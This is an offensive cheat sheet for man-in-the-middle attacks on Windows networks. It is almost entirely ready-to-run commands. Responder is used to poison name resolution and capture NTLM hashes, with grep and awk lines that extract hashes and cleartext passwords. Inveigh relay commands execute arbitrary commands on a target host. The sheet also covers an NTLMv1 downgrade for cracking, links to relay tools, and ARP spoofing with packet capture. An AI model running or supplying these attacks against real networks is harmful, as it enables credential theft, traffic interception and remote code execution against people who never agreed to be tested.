MITM

Responder

Set challenge to 1122334455667788 in /etc/responder/Responder.conf

Passive mode

responder -I <interface> -A

Active mode

responder -I <interface> -wrf

Aggressive mode

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM

NTLM MITM attacks

https://github.com/Kevin-Robertson/Inveigh (PowerShell) https://github.com/Kevin-Robertson/InveighZero (C#)

Inveigh can be executed without elevated privileges but certain features such as LLMNR spoofer will not be able to start. Be sure that used ports are allowed by the local firewall.

Sniffer

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Relay

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session

Packet can be captured in order to extract the hashes

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100MB traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack https://crack.sh

misc::easyntlmchall
NTLM Relay

Under construction

SMB signing has to be disable for this kind of attack.

https://github.com/Kevin-Robertson/Inveigh/blob/master/Scripts/Inveigh-Relay.ps1 https://github.com/lgandx/Responder/blob/master/tools/MultiRelay.py https://www.rapid7.com/db/modules/exploit/windows/smb/smb_relay https://github.com/CoreSecurity/impacket/blob/master/examples/ntlmrelayx.py https://github.com/Arno0x/NtlmRelayToEWS

ARP Spoofing

Without Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -S 65535 -w out.pcap -vv

With Gateway

sysctl -w net.ipv4.ip_forward=1
arpspoof -t <target> <gateway>
tcpdump -i eth0 -S 65535 -w out.pcap -vv